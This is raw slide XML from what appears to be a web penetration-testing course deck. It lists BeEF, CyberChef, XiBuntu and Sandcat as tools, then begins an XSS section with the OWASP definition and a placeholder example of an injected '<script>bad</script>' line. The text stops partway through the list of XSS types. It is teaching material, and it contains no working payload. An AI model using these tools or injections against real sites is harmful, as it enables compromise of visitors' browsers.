              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C0ABAB-DE3F-441F-ADC0-D2D52C8D69A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059159" y="1798321"/>
            <a:ext cx="7419048" cy="3647619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26647124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D966-6570-4BC1-B812-4910C64F0B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8F1783-72EB-4E27-AE74-2E485028A8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Installation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D431F5-0091-4F5D-83F5-233EC9451D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434575" y="1693036"/>
            <a:ext cx="8238393" cy="5000458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22941675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76C1E-7401-4EAC-9B25-0EEC95DFE8DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28ECF0FA-565A-4312-B1E7-242A1A94BD6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different opinions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Report Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92D8615-48BD-47B4-899C-2F7F3B54FBBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839200" y="1990803"/>
            <a:ext cx="1390476" cy="1257143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D3E1533-C240-4378-80C7-4B90A2DBE2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2257470"/>
            <a:ext cx="2209524" cy="990476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19282393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7E651-11B5-4074-91C6-10A16801FB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9377FC65-ECA0-4C2B-85C2-4437D143295A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberChef</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F391BBF5-979E-499B-9AD0-DC5511003F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300572" y="2045719"/>
            <a:ext cx="8167178" cy="4396065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416208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B3575-297D-4B5E-A315-B9B1AE72589A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Overall 6.0 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="C:\Users\PC\AppData\Local\Temp\SNAGHTMLf48bcf3.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4E8FDA-979B-46BC-ABF1-C7412FC76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 y="1524000"/>
            <a:ext cx="11972925"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57729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76471-6BB2-4B7E-99DD-3106189DAA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CCB687-1C38-42B5-9DE9-AF87B77ADBFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654341" y="1837189"/>
            <a:ext cx="3145872" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Mark Down Language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43DFB75D-509C-4005-B0D2-490CB2AE1329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="866775" y="2575093"/>
            <a:ext cx="10248900" cy="2682706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228526898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5C3B-338D-477F-BC22-66065B85E179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Markdown Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA1F47B-8EB0-4299-A854-5CAD26D36E90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="576089" y="1543050"/>
            <a:ext cx="9596611" cy="5272751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17807114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F87B-1555-4C37-8E68-A028052C5542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892E1DAA-78D8-4DFE-A05E-B7093C7AB4C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>XiBuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>is a penetration testing distribution aimed at meeting the needs of ethical hackers operating within a corporate environment. The distribution is based on Ubuntu and uses only open source (GPL) tools; it is named after Xi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Cygni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> a fourth order magnitude star.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A21FDCD-C2F2-4DC9-9F8C-878EC83ABA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2924175" y="2933451"/>
            <a:ext cx="5700096" cy="3590785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13841025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D14DE-AC67-47E0-BFB1-072DAC068062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77729F1-E47F-4AD9-AE4B-B9FB300EFE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Sandcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>6 brings unique features that are useful for pen-testers and web developers. Sandcat is built on top of Chromium and uses the Lua programming language to provide extensions and scripting support.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2EF5E5-5F91-47BA-9AFF-E5C43F3CF6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="810187" y="3157727"/>
            <a:ext cx="8990476" cy="3038095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34314905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A69B6-6EBB-42A8-9191-3DE333858BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="300000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8147915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Part III - XSS – Cross site Scripting</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573161"/>
            <a:ext cx="9905999" cy="4218040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15664061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XSS – What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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37652" y="1465006"/>
            <a:ext cx="11769213" cy="5206744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting is one of the oldest web application attacks known and is dated around 1996-1998 when it was possible to control frames within a web page through injected code, thus “crossing” the website boundaries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>2017-A7 – Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS flaws occur whenever an application includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>untrusted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;script&gt;good &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;script&gt;good &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;bad&lt;/script&gt;		// inserted into the site from a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;script&gt;good &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796955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6241-8713-4A74-92B5-80844360017E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506B6B59-D99A-45BF-9E49-80A0A3F2775A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3 Main Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Reflective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
